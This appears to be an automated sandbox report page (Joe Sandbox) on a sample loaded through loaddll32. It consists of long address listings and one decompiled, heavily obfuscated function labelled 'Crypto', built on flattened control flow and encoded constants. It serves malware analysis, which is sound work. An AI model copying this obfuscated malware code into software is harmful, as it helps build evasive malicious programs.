                                                                                                          0x02ae24df
                                                                                                          0x02ae24e7
                                                                                                          0x02ae24f2
                                                                                                          0x02ae24fd
                                                                                                          0x02ae2513
                                                                                                          0x02ae251a
                                                                                                          0x02ae2525
                                                                                                          0x02ae2530
                                                                                                          0x02ae253b
                                                                                                          0x02ae2546
                                                                                                          0x02ae2559
                                                                                                          0x02ae255a
                                                                                                          0x02ae2561
                                                                                                          0x02ae256c
                                                                                                          0x02ae2574
                                                                                                          0x02ae257c
                                                                                                          0x02ae2584
                                                                                                          0x02ae258c
                                                                                                          0x02ae2597
                                                                                                          0x02ae259f
                                                                                                          0x02ae25aa
                                                                                                          0x02ae25b2
                                                                                                          0x02ae25ba
                                                                                                          0x02ae25bf
                                                                                                          0x02ae25c4
                                                                                                          0x02ae25cc
                                                                                                          0x02ae25e0
                                                                                                          0x02ae25f2
                                                                                                          0x02ae25f7
                                                                                                          0x02ae2600
                                                                                                          0x02ae260b
                                                                                                          0x02ae2613
                                                                                                          0x02ae261b
                                                                                                          0x02ae2623
                                                                                                          0x02ae262b
                                                                                                          0x02ae2633
                                                                                                          0x02ae263b
                                                                                                          0x02ae2643
                                                                                                          0x02ae264b
                                                                                                          0x02ae2650
                                                                                                          0x02ae2658
                                                                                                          0x02ae2660
                                                                                                          0x02ae2665
                                                                                                          0x02ae266a
                                                                                                          0x02ae2672
                                                                                                          0x02ae267d
                                                                                                          0x02ae2688
                                                                                                          0x02ae2693
                                                                                                          0x02ae269b
                                                                                                          0x02ae26a4
                                                                                                          0x02ae26a7
                                                                                                          0x02ae26ab
                                                                                                          0x02ae26b3
                                                                                                          0x02ae26bb
                                                                                                          0x02ae26c3
                                                                                                          0x02ae26cb
                                                                                                          0x02ae26d3
                                                                                                          0x02ae26db
                                                                                                          0x02ae26e6
                                                                                                          0x02ae26f1
                                                                                                          0x02ae26fc
                                                                                                          0x02ae2707
                                                                                                          0x02ae2712
                                                                                                          0x02ae271d
                                                                                                          0x02ae2728
                                                                                                          0x02ae2733
                                                                                                          0x02ae273e
                                                                                                          0x02ae2746
                                                                                                          0x02ae274b
                                                                                                          0x02ae2755
                                                                                                          0x02ae2759
                                                                                                          0x02ae2761
                                                                                                          0x02ae276c
                                                                                                          0x02ae2774
                                                                                                          0x02ae277f
                                                                                                          0x02ae2792
                                                                                                          0x02ae2799
                                                                                                          0x02ae27a4
                                                                                                          0x02ae27ac
                                                                                                          0x02ae27b1
                                                                                                          0x02ae27b9
                                                                                                          0x02ae27c1
                                                                                                          0x02ae27c9
                                                                                                          0x02ae27d1
                                                                                                          0x02ae27d9
                                                                                                          0x02ae27e1
                                                                                                          0x02ae27e9
                                                                                                          0x02ae27f1
                                                                                                          0x02ae27fc
                                                                                                          0x02ae2807
                                                                                                          0x02ae2812
                                                                                                          0x02ae281a
                                                                                                          0x02ae2822
                                                                                                          0x02ae2827
                                                                                                          0x02ae282f
                                                                                                          0x02ae283c
                                                                                                          0x02ae2840
                                                                                                          0x02ae2848
                                                                                                          0x02ae284d
                                                                                                          0x02ae2857
                                                                                                          0x02ae285f
                                                                                                          0x02ae2867
                                                                                                          0x02ae286f
                                                                                                          0x02ae2874
                                                                                                          0x02ae287c
                                                                                                          0x02ae2887
                                                                                                          0x02ae288f
                                                                                                          0x02ae289a
                                                                                                          0x02ae28a5
                                                                                                          0x02ae28ad
                                                                                                          0x02ae28b8
                                                                                                          0x02ae28c0
                                                                                                          0x02ae28c7
                                                                                                          0x02ae28c8
                                                                                                          0x02ae28cc
                                                                                                          0x02ae28d1
                                                                                                          0x02ae28d9
                                                                                                          0x02ae28e1
                                                                                                          0x02ae28ef
                                                                                                          0x02ae28f8
                                                                                                          0x02ae2901
                                                                                                          0x02ae2905
                                                                                                          0x02ae290d
                                                                                                          0x02ae2918
                                                                                                          0x02ae2923
                                                                                                          0x02ae292e
                                                                                                          0x02ae2936
                                                                                                          0x02ae293b
                                                                                                          0x02ae2943
                                                                                                          0x02ae294b
                                                                                                          0x02ae2953
                                                                                                          0x02ae295b
                                                                                                          0x02ae2963
                                                                                                          0x02ae296b
                                                                                                          0x02ae2970
                                                                                                          0x02ae2978
                                                                                                          0x02ae2980
                                                                                                          0x02ae2988
                                                                                                          0x02ae2990
                                                                                                          0x02ae2998
                                                                                                          0x02ae29a0
                                                                                                          0x02ae29a8
                                                                                                          0x02ae29b0
                                                                                                          0x02ae29b8
                                                                                                          0x02ae29c0
                                                                                                          0x02ae29cb
                                                                                                          0x02ae29d3
                                                                                                          0x02ae29de
                                                                                                          0x02ae29e6
                                                                                                          0x02ae29f3
                                                                                                          0x02ae29f7
                                                                                                          0x02ae29ff
                                                                                                          0x02ae2a07
                                                                                                          0x02ae2a0f
                                                                                                          0x02ae2a17
                                                                                                          0x02ae2a1f
                                                                                                          0x02ae2a27
                                                                                                          0x02ae2a32
                                                                                                          0x02ae2a3d
                                                                                                          0x02ae2a48
                                                                                                          0x02ae2a53
                                                                                                          0x02ae2a5e
                                                                                                          0x02ae2a66
                                                                                                          0x02ae2a71
                                                                                                          0x02ae2a79
                                                                                                          0x02ae2a81
                                                                                                          0x02ae2a89
                                                                                                          0x02ae2a91
                                                                                                          0x02ae2a99
                                                                                                          0x02ae2a9e
                                                                                                          0x02ae2aa6
                                                                                                          0x02ae2aae
                                                                                                          0x02ae2ab9
                                                                                                          0x02ae2ac6
                                                                                                          0x02ae2ad1
                                                                                                          0x02ae2ad8
                                                                                                          0x02ae2ad8
                                                                                                          0x02ae2add
                                                                                                          0x00000000
                                                                                                          0x02ae2ae2
                                                                                                          0x02ae2af4
                                                                                                          0x02ae2d78
                                                                                                          0x02ae2da3
                                                                                                          0x02ae2dab
                                                                                                          0x02ae2dad
                                                                                                          0x02ae2de9
                                                                                                          0x02ae2de9
                                                                                                          0x02ae2de9
                                                                                                          0x02ae2dc1
                                                                                                          0x02ae2dc6
                                                                                                          0x02ae2dcb
                                                                                                          0x02ae2dd2
                                                                                                          0x02ae2dd9
                                                                                                          0x00000000
                                                                                                          0x02ae2dde
                                                                                                          0x02ae2afc
                                                                                                          0x02ae2d64
                                                                                                          0x02ae2d6b
                                                                                                          0x02ae2d72
                                                                                                          0x00000000
                                                                                                          0x02ae2d72
                                                                                                          0x02ae2b04
                                                                                                          0x02ae2cb3
                                                                                                          0x02ae2ce4
                                                                                                          0x02ae2ce9
                                                                                                          0x02ae2cec
                                                                                                          0x02ae2cee
                                                                                                          0x02ae2d02
                                                                                                          0x02ae2d17
                                                                                                          0x02ae2d1c
                                                                                                          0x02ae2c89
                                                                                                          0x02ae2c89
                                                                                                          0x02ae2ad8
                                                                                                          0x02ae2ad8
                                                                                                          0x02ae2add
                                                                                                          0x00000000
                                                                                                          0x02ae2add
                                                                                                          0x02ae2ad8
                                                                                                          0x02ae2b10
                                                                                                          0x02ae2ca9
                                                                                                          0x00000000
                                                                                                          0x02ae2ca9
                                                                                                          0x02ae2b1c
                                                                                                          0x02ae2b99
                                                                                                          0x02ae2bc1
                                                                                                          0x02ae2be2
                                                                                                          0x02ae2bef
                                                                                                          0x02ae2bf3
                                                                                                          0x02ae2bfa
                                                                                                          0x02ae2c46
                                                                                                          0x02ae2c63
                                                                                                          0x02ae2c68
                                                                                                          0x02ae2c85
                                                                                                          0x02ae2c87
                                                                                                          0x02ae2c90
                                                                                                          0x02ae2c9a
                                                                                                          0x02ae2c9c
                                                                                                          0x02ae2ca1
                                                                                                          0x00000000
                                                                                                          0x02ae2ca1
                                                                                                          0x00000000
                                                                                                          0x02ae2c87
                                                                                                          0x02ae2b24
                                                                                                          0x02ae2d56
                                                                                                          0x02ae2d56
                                                                                                          0x02ae2d5c
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02ae2d5c
                                                                                                          0x02ae2b2c
                                                                                                          0x02ae2b72
                                                                                                          0x00000000
                                                                                                          0x02ae2b72
                                                                                                          0x02ae2b2e
                                                                                                          0x02ae2b39
                                                                                                          0x02ae2b58
                                                                                                          0x02ae2b5d
                                                                                                          0x02ae2b62
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02ae2b68
                                                                                                          0x00000000
                                                                                                          0x02ae2b68
                                                                                                          0x02ae2d31
                                                                                                          0x02ae2d3d
                                                                                                          0x02ae2d44
                                                                                                          0x02ae2d49
                                                                                                          0x02ae2d4e
                                                                                                          0x02ae2d51
                                                                                                          0x00000000
                                                                                                          0x02ae2d51

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $P$5{,$8&$J_%$M%$OAY$i*P$|":$}j
                                                                                                          • API String ID: 0-2024644708
                                                                                                          • Opcode ID: dba97dcee0fa6a2d9b5c8e4d469fbd145e5eadf62a09673e202de5ec46f9d310
                                                                                                          • Instruction ID: 5af0c9df1772445ea76cc6fe58e2c0d5aa5c1b9cd89b7651fa94bf6ffb876082
                                                                                                          • Opcode Fuzzy Hash: dba97dcee0fa6a2d9b5c8e4d469fbd145e5eadf62a09673e202de5ec46f9d310
                                                                                                          • Instruction Fuzzy Hash: 183211714093819FD778CF61C589B8FBBE1BBC4308F50891DE69A96260DBB18949CF13
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AFB257, Relevance: 11.7, Strings: 9, Instructions: 425COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 67%
                                                                                                          			E02AFB257(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v4;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				unsigned int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				intOrPtr _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				intOrPtr _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				intOrPtr _t442;
				void* _t450;
				signed int _t452;
				intOrPtr _t464;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				signed int _t470;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				intOrPtr _t476;
				void* _t511;
				intOrPtr* _t519;
				signed int _t522;
				signed int* _t528;
				void* _t531;

				_push(_a8);
				_push(_a4);
				_v16 = __ecx;
				_push(__edx);
				_push(__ecx);
				E02AFFE29(__ecx);
				_v104 = 0xdca0c2;
				_t528 =  &(( &_v196)[4]);
				_v104 = _v104 ^ 0x20eddded;
				_v104 = _v104 + 0xc1e4;
				_t464 = 0;
				_v104 = _v104 ^ 0x20323f12;
				_t526 = 0;
				_v100 = 0xb7a414;
				_t522 = 0x63dbfd2;
				_v100 = _v100 >> 0xd;
				_v100 = _v100 >> 6;
				_v100 = _v100 ^ 0x00000017;
				_v56 = 0x45a952;
				_t466 = 0x59;
				_v56 = _v56 * 0x5b;
				_v56 = _v56 ^ 0x18c33027;
				_v188 = 0x2a9354;
				_v188 = _v188 * 0x52;
				_v188 = _v188 + 0xffff09d3;
				_v188 = _v188 ^ 0x657f446d;
				_v188 = _v188 ^ 0x68d207a2;
				_v156 = 0xab48ef;
				_v156 = _v156 >> 9;
				_v156 = _v156 ^ 0x16e9b314;
				_v156 = _v156 + 0xffff4dee;
				_v156 = _v156 ^ 0x16e86217;
				_v76 = 0xa04b9d;
				_v76 = _v76 / _t466;
				_v76 = _v76 + 0xffff95c9;
				_v76 = _v76 ^ 0x000bb2f5;
				_v96 = 0x5e9ce7;
				_v96 = _v96 >> 0xb;
				_v96 = _v96 + 0x393b;
				_v96 = _v96 ^ 0x0008104f;
				_v168 = 0x9b8ea1;
				_v168 = _v168 >> 3;
				_v168 = _v168 ^ 0x41b76bd4;
				_t467 = 0x4a;
				_v168 = _v168 / _t467;
				_v168 = _v168 ^ 0x00e0763a;
				_v84 = 0x6b9fd8;
				_v84 = _v84 + 0xffff492d;
				_v84 = _v84 ^ 0xc4f61535;
				_v84 = _v84 ^ 0xc49355d0;
				_v92 = 0xe62d26;
				_v92 = _v92 + 0xffffd3ae;
				_v92 = _v92 + 0xba25;
				_v92 = _v92 ^ 0x00e8488b;
				_v176 = 0x224b80;
				_v176 = _v176 * 0x64;
				_v176 = _v176 + 0xbfa2;
				_v176 = _v176 ^ 0x4d1eb270;
				_v176 = _v176 ^ 0x4076c61f;
				_v24 = 0x19cf70;
				_v24 = _v24 ^ 0x9000781e;
				_v24 = _v24 ^ 0x90166967;
				_v88 = 0x46d2d8;
				_v88 = _v88 << 0xd;
				_v88 = _v88 + 0x562b;
				_v88 = _v88 ^ 0xda50dff0;
				_v112 = 0x785cae;
				_v112 = _v112 ^ 0x168a73c4;
				_v112 = _v112 | 0x1d89c9b4;
				_v112 = _v112 ^ 0x1ff91637;
				_v196 = 0xff4614;
				_t468 = 0x5f;
				_v196 = _v196 / _t468;
				_v196 = _v196 + 0x757b;
				_t469 = 0x16;
				_v196 = _v196 * 0x60;
				_v196 = _v196 ^ 0x012524f0;
				_v80 = 0xc3120d;
				_v80 = _v80 | 0x1e4982bc;
				_v80 = _v80 * 0x7e;
				_v80 = _v80 ^ 0x2837c3c2;
				_v120 = 0xd97d0d;
				_v120 = _v120 << 0xd;
				_v120 = _v120 + 0x504;
				_v120 = _v120 ^ 0x2fa67262;
				_v172 = 0x34730a;
				_t142 =  &_v172; // 0x34730a
				_v172 =  *_t142 * 0x22;
				_t144 =  &_v172; // 0x34730a
				_v172 =  *_t144 / _t469;
				_v172 = _v172 << 8;
				_v172 = _v172 ^ 0x5108b0e0;
				_v68 = 0x5410d;
				_v68 = _v68 | 0x0af8be45;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0xafd73693;
				_v40 = 0x3314ee;
				_v40 = _v40 << 6;
				_v40 = _v40 ^ 0x0cc221f8;
				_v148 = 0xdcf092;
				_v148 = _v148 >> 2;
				_t470 = 0x7d;
				_v148 = _v148 * 7;
				_v148 = _v148 ^ 0xc025e338;
				_v148 = _v148 ^ 0xc1a4d56b;
				_v48 = 0x99791e;
				_v48 = _v48 + 0xd07a;
				_v48 = _v48 ^ 0x009468bf;
				_v20 = 0xfa3426;
				_v20 = _v20 * 0x2f;
				_v20 = _v20 ^ 0x2dec6acf;
				_v128 = 0x599df;
				_v128 = _v128 / _t470;
				_v128 = _v128 ^ 0x7679aa05;
				_v128 = _v128 ^ 0x7675df44;
				_v124 = 0xbc7529;
				_t471 = 0x70;
				_v124 = _v124 / _t471;
				_v124 = _v124 * 5;
				_v124 = _v124 ^ 0x00024b90;
				_v140 = 0x23c06e;
				_v140 = _v140 << 8;
				_v140 = _v140 + 0xffff4990;
				_v140 = _v140 ^ 0x23b90b70;
				_v32 = 0x48411;
				_v32 = _v32 >> 0xd;
				_v32 = _v32 ^ 0x000cf15b;
				_v28 = 0x8f257d;
				_v28 = _v28 >> 0xa;
				_v28 = _v28 ^ 0x00045aca;
				_v72 = 0xc5b926;
				_t472 = 0x25;
				_v72 = _v72 * 0xd;
				_v72 = _v72 + 0x5de2;
				_v72 = _v72 ^ 0x0a0d42ec;
				_v52 = 0xb82feb;
				_v52 = _v52 / _t472;
				_v52 = _v52 ^ 0x000a7562;
				_v192 = 0x93d477;
				_v192 = _v192 + 0x2145;
				_v192 = _v192 >> 9;
				_t473 = 0x79;
				_v192 = _v192 / _t473;
				_v192 = _v192 ^ 0x000494fa;
				_v60 = 0xdd5e00;
				_v60 = _v60 + 0xe8be;
				_v60 = _v60 ^ 0x00d904e2;
				_v116 = 0xf92f20;
				_v116 = _v116 << 2;
				_v116 = _v116 + 0xffff4fca;
				_v116 = _v116 ^ 0x03e480d1;
				_v108 = 0xc8e556;
				_v108 = _v108 << 0xe;
				_v108 = _v108 | 0x9333dae4;
				_v108 = _v108 ^ 0xbb75d6e6;
				_v184 = 0xf22b18;
				_v184 = _v184 + 0xffff5aea;
				_v184 = _v184 ^ 0x0621037b;
				_v184 = _v184 + 0xffff0635;
				_v184 = _v184 ^ 0x06c19238;
				_v36 = 0xa8ef7f;
				_v36 = _v36 + 0xffff4107;
				_v36 = _v36 ^ 0x00ab8625;
				_v44 = 0xa6062e;
				_v44 = _v44 << 0xd;
				_v44 = _v44 ^ 0xc0ced932;
				_v180 = 0x5e49fc;
				_v180 = _v180 + 0x375b;
				_v180 = _v180 << 2;
				_t474 = 0x74;
				_v180 = _v180 * 0x1c;
				_v180 = _v180 ^ 0x2957b537;
				_v164 = 0x531cb2;
				_v164 = _v164 << 0xf;
				_v164 = _v164 ^ 0x1fcb8a78;
				_v164 = _v164 / _t474;
				_v164 = _v164 ^ 0x014b6a45;
				_v64 = 0x492d9e;
				_v64 = _v64 ^ 0x2124760e;
				_v64 = _v64 ^ 0x216a5ba9;
				_v132 = 0x711783;
				_v132 = _v132 | 0x71acd4bd;
				_v132 = _v132 + 0x97cf;
				_v132 = _v132 ^ 0x71fa50e2;
				_v152 = 0xb0a3b1;
				_v152 = _v152 ^ 0xa6c9b18c;
				_t475 = 0x5e;
				_v152 = _v152 / _t475;
				_v152 = _v152 / _t475;
				_v152 = _v152 ^ 0x0003c09f;
				_v136 = 0xe5fa51;
				_v136 = _v136 + 0xde7e;
				_v136 = _v136 + 0xffffe7ef;
				_v136 = _v136 ^ 0x00ec445b;
				_t519 = _v12;
				while(1) {
					L1:
					_t442 = _v144;
					while(1) {
						L2:
						while(1) {
							L3:
							_t476 = _v160;
							while(1) {
								L4:
								_t531 = _t522 - 0x93283d2;
								if(_t531 > 0) {
									break;
								}
								if(_t531 == 0) {
									return E02B02B09(_v132, _t464, _v152, _v136);
								}
								if(_t522 == 0x6c245) {
									_push( &_v12);
									_push(_t464);
									_push(_t476);
									_push(_v68);
									_push(_v172);
									_push(_v120);
									_push(_v80);
									_push(_t476);
									_push(_v196);
									_push(_t476);
									_push(_v112);
									_push(_v88);
									_push(_v16);
									_t450 = E02AEFA95( &_v8, _v24);
									_t528 = _t528 - 0xc + 0x40;
									if(_t450 == 0) {
										L25:
										_t522 = 0x635125b;
										while(1) {
											L1:
											_t442 = _v144;
											goto L2;
										}
									} else {
										_t452 = E02AEDC1B( &_v8);
										_t522 = 0x4f2b403;
										_t442 = _v12 * 0x2c + _t464;
										_v144 = _t442;
										_t519 =  >=  ? _t464 : (_t452 & 0x0000001f) * 0x2c + _t464;
										goto L2;
									}
									L34:
								} else {
									if(_t522 == 0x4f2b403) {
										_t476 = E02AEEE62(_v148, _v16, _v48, _v20, _v128, _v56,  *_t519);
										_t528 =  &(_t528[5]);
										_t442 = _v144;
										_v160 = _t476;
										_t511 = 0xe34a72e;
										_t522 =  !=  ? 0xe34a72e : 0xced26bb;
										continue;
									} else {
										if(_t522 == 0x635125b) {
											E02B02B09(_v180, _t526, _v164, _v64);
											_t522 = 0x93283d2;
											while(1) {
												L1:
												_t442 = _v144;
												goto L2;
											}
										} else {
											if(_t522 == 0x63dbfd2) {
												_t522 = 0x8a8e175;
												continue;
											} else {
												if(_t522 != 0x8a8e175) {
													L30:
													if(_t522 != 0xfb7e38f) {
														_t442 = _v144;
														goto L3;
													}
												} else {
													_push(_t476);
													_push(_t476);
													_t442 = E02AEC5D8(0x20000);
													_t464 = _t442;
													_t528 =  &(_t528[3]);
													if(_t464 != 0) {
														_t522 = 0x965da6a;
														while(1) {
															L1:
															_t442 = _v144;
															L2:
															L3:
															_t476 = _v160;
															goto L4;
														}
													}
												}
											}
										}
									}
								}
								L33:
								return _t442;
								goto L34;
							}
							if(_t522 == 0x965da6a) {
								_push(_t476);
								_push(_t476);
								_t442 = E02AEC5D8(0x2000);
								_t526 = _t442;
								_t528 =  &(_t528[3]);
								if(_t442 == 0) {
									_t522 = 0x93283d2;
									goto L29;
								} else {
									_t522 = 0x6c245;
									goto L1;
								}
							} else {
								if(_t522 == 0xbf0ab43) {
									E02AEC3A7(_v100, _a8, _v108, _v184, _t526, _v36, _v44);
									_t528 =  &(_t528[5]);
									goto L25;
								} else {
									if(_t522 == 0xced26bb) {
										_t519 = _t519 + 0x2c;
										asm("sbb esi, esi");
										_t522 = (_t522 & 0xfebda1a8) + 0x635125b;
										goto L4;
									} else {
										if(_t522 == _t511) {
											E02AFFD4E(_v124, _v140, _v32, _v28,  &_v4, _v72, _t476, _v104, _t526);
											_t522 =  !=  ? 0xbf0ab43 : 0xced26bb;
											_t442 = E02AE3046(_v52, _v192, _v60, _v160, _v116);
											_t528 =  &(_t528[0xb]);
											L29:
											_t511 = 0xe34a72e;
										}
										goto L30;
									}
								}
							}
							goto L33;
						}
					}
				}
			}








































































                                                                                                          0x02afb261
                                                                                                          0x02afb26a
                                                                                                          0x02afb271
                                                                                                          0x02afb278
                                                                                                          0x02afb279
                                                                                                          0x02afb27a
                                                                                                          0x02afb27f
                                                                                                          0x02afb287
                                                                                                          0x02afb28a
                                                                                                          0x02afb294
                                                                                                          0x02afb29c
                                                                                                          0x02afb29e
                                                                                                          0x02afb2a6
                                                                                                          0x02afb2a8
                                                                                                          0x02afb2b0
                                                                                                          0x02afb2b5
                                                                                                          0x02afb2ba
                                                                                                          0x02afb2bf
                                                                                                          0x02afb2c4
                                                                                                          0x02afb2d9
                                                                                                          0x02afb2dc
                                                                                                          0x02afb2e3
                                                                                                          0x02afb2ee
                                                                                                          0x02afb2fb
                                                                                                          0x02afb2ff
                                                                                                          0x02afb307
                                                                                                          0x02afb30f
                                                                                                          0x02afb317
                                                                                                          0x02afb31f
                                                                                                          0x02afb324
                                                                                                          0x02afb32c
                                                                                                          0x02afb334
                                                                                                          0x02afb33c
                                                                                                          0x02afb352
                                                                                                          0x02afb359
                                                                                                          0x02afb364
                                                                                                          0x02afb36f
                                                                                                          0x02afb377
                                                                                                          0x02afb37c
                                                                                                          0x02afb384
                                                                                                          0x02afb38c
                                                                                                          0x02afb394
                                                                                                          0x02afb399
                                                                                                          0x02afb3a5
                                                                                                          0x02afb3a8
                                                                                                          0x02afb3ac
                                                                                                          0x02afb3b4
                                                                                                          0x02afb3bf
                                                                                                          0x02afb3ca
                                                                                                          0x02afb3d5
                                                                                                          0x02afb3e0
                                                                                                          0x02afb3e8
                                                                                                          0x02afb3f0
                                                                                                          0x02afb3f8
                                                                                                          0x02afb400
                                                                                                          0x02afb40d
                                                                                                          0x02afb411
                                                                                                          0x02afb419
                                                                                                          0x02afb421
                                                                                                          0x02afb429
                                                                                                          0x02afb434
                                                                                                          0x02afb43f
                                                                                                          0x02afb44a
                                                                                                          0x02afb452
                                                                                                          0x02afb457
                                                                                                          0x02afb45f
                                                                                                          0x02afb469
                                                                                                          0x02afb471
                                                                                                          0x02afb479
                                                                                                          0x02afb481
                                                                                                          0x02afb489
                                                                                                          0x02afb497
                                                                                                          0x02afb49c
                                                                                                          0x02afb4a2
                                                                                                          0x02afb4af
                                                                                                          0x02afb4b2
                                                                                                          0x02afb4b6
                                                                                                          0x02afb4be
                                                                                                          0x02afb4c9
                                                                                                          0x02afb4dc
                                                                                                          0x02afb4e3
                                                                                                          0x02afb4ee
                                                                                                          0x02afb4f6
                                                                                                          0x02afb4fb
                                                                                                          0x02afb503
                                                                                                          0x02afb50b
                                                                                                          0x02afb513
                                                                                                          0x02afb518
                                                                                                          0x02afb51c
                                                                                                          0x02afb524
                                                                                                          0x02afb528
                                                                                                          0x02afb52d
                                                                                                          0x02afb535
                                                                                                          0x02afb540
                                                                                                          0x02afb54b
                                                                                                          0x02afb553
                                                                                                          0x02afb55e
                                                                                                          0x02afb569
                                                                                                          0x02afb571
                                                                                                          0x02afb57c
                                                                                                          0x02afb584
                                                                                                          0x02afb58e
                                                                                                          0x02afb591
                                                                                                          0x02afb595
                                                                                                          0x02afb59d
                                                                                                          0x02afb5a5
                                                                                                          0x02afb5b0
                                                                                                          0x02afb5bb
                                                                                                          0x02afb5c6
                                                                                                          0x02afb5d9
                                                                                                          0x02afb5e0
                                                                                                          0x02afb5eb
                                                                                                          0x02afb5fb
                                                                                                          0x02afb5ff
                                                                                                          0x02afb607
                                                                                                          0x02afb60f
                                                                                                          0x02afb61b
                                                                                                          0x02afb61e
                                                                                                          0x02afb627
                                                                                                          0x02afb62b
                                                                                                          0x02afb633
                                                                                                          0x02afb63b
                                                                                                          0x02afb640
                                                                                                          0x02afb648
                                                                                                          0x02afb650
                                                                                                          0x02afb65b
                                                                                                          0x02afb663
                                                                                                          0x02afb670
                                                                                                          0x02afb67b
                                                                                                          0x02afb683
                                                                                                          0x02afb68e
                                                                                                          0x02afb6a3
                                                                                                          0x02afb6a6
                                                                                                          0x02afb6ad
                                                                                                          0x02afb6b8
                                                                                                          0x02afb6c3
                                                                                                          0x02afb6d9
                                                                                                          0x02afb6e0
                                                                                                          0x02afb6eb
                                                                                                          0x02afb6f3
                                                                                                          0x02afb6fb
                                                                                                          0x02afb704
                                                                                                          0x02afb709
                                                                                                          0x02afb70f
                                                                                                          0x02afb717
                                                                                                          0x02afb722
                                                                                                          0x02afb72d
                                                                                                          0x02afb738
                                                                                                          0x02afb740
                                                                                                          0x02afb745
                                                                                                          0x02afb74d
                                                                                                          0x02afb755
                                                                                                          0x02afb75d
                                                                                                          0x02afb762
                                                                                                          0x02afb76a
                                                                                                          0x02afb772
                                                                                                          0x02afb77a
                                                                                                          0x02afb782
                                                                                                          0x02afb78a
                                                                                                          0x02afb792
                                                                                                          0x02afb79a
                                                                                                          0x02afb7a5
                                                                                                          0x02afb7b0
                                                                                                          0x02afb7bb
                                                                                                          0x02afb7c6
                                                                                                          0x02afb7ce
                                                                                                          0x02afb7d9
                                                                                                          0x02afb7e1
                                                                                                          0x02afb7e9
                                                                                                          0x02afb7f3
                                                                                                          0x02afb7f6
                                                                                                          0x02afb7fa
                                                                                                          0x02afb802
                                                                                                          0x02afb80a
                                                                                                          0x02afb80f
                                                                                                          0x02afb81f
                                                                                                          0x02afb823
                                                                                                          0x02afb82b
                                                                                                          0x02afb836
                                                                                                          0x02afb841
                                                                                                          0x02afb84c
                                                                                                          0x02afb854
                                                                                                          0x02afb85c
                                                                                                          0x02afb864
                                                                                                          0x02afb86c
                                                                                                          0x02afb874
                                                                                                          0x02afb880
                                                                                                          0x02afb883
                                                                                                          0x02afb88f
                                                                                                          0x02afb893
                                                                                                          0x02afb89b
                                                                                                          0x02afb8a3
                                                                                                          0x02afb8ab
                                                                                                          0x02afb8b3
                                                                                                          0x02afb8bb
                                                                                                          0x02afb8c2
                                                                                                          0x02afb8c2
                                                                                                          0x02afb8c2
                                                                                                          0x02afb8c6
                                                                                                          0x02afb8c6
                                                                                                          0x02afb8cb
                                                                                                          0x02afb8cb
                                                                                                          0x02afb8cb
                                                                                                          0x02afb8cf
                                                                                                          0x02afb8cf
                                                                                                          0x02afb8cf
                                                                                                          0x02afb8d5
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02afb8db
                                                                                                          0x00000000
                                                                                                          0x02afbb8a
                                                                                                          0x02afb8e7
                                                                                                          0x02afb9c3
                                                                                                          0x02afb9c4
                                                                                                          0x02afb9c5
                                                                                                          0x02afb9c6
                                                                                                          0x02afb9cd
                                                                                                          0x02afb9d1
                                                                                                          0x02afb9d5
                                                                                                          0x02afb9dc
                                                                                                          0x02afb9dd
                                                                                                          0x02afb9e1
                                                                                                          0x02afb9e2
                                                                                                          0x02afb9f3
                                                                                                          0x02afba01
                                                                                                          0x02afba08
                                                                                                          0x02afba0d
                                                                                                          0x02afba12
                                                                                                          0x02afbb1f
                                                                                                          0x02afbb1f
                                                                                                          0x02afb8c2
                                                                                                          0x02afb8c2
                                                                                                          0x02afb8c2
                                                                                                          0x00000000
                                                                                                          0x02afb8c2
                                                                                                          0x02afba18
                                                                                                          0x02afba1f
                                                                                                          0x02afba27
                                                                                                          0x02afba39
                                                                                                          0x02afba3d
                                                                                                          0x02afba41
                                                                                                          0x00000000
                                                                                                          0x02afba41
                                                                                                          0x00000000
                                                                                                          0x02afb8ed
                                                                                                          0x02afb8f3
                                                                                                          0x02afb99b
                                                                                                          0x02afb99d
                                                                                                          0x02afb9a0
                                                                                                          0x02afb9ab
                                                                                                          0x02afb9af
                                                                                                          0x02afb9b4
                                                                                                          0x00000000
                                                                                                          0x02afb8f5
                                                                                                          0x02afb8fb
                                                                                                          0x02afb95f
                                                                                                          0x02afb966
                                                                                                          0x02afb8c2
                                                                                                          0x02afb8c2
                                                                                                          0x02afb8c2
                                                                                                          0x00000000
                                                                                                          0x02afb8c2
                                                                                                          0x02afb8fd
                                                                                                          0x02afb903
                                                                                                          0x02afb947
                                                                                                          0x00000000
                                                                                                          0x02afb905
                                                                                                          0x02afb90b
                                                                                                          0x02afbb65
                                                                                                          0x02afbb6b
                                                                                                          0x02afbb6d
                                                                                                          0x00000000
                                                                                                          0x02afbb6d
                                                                                                          0x02afb911
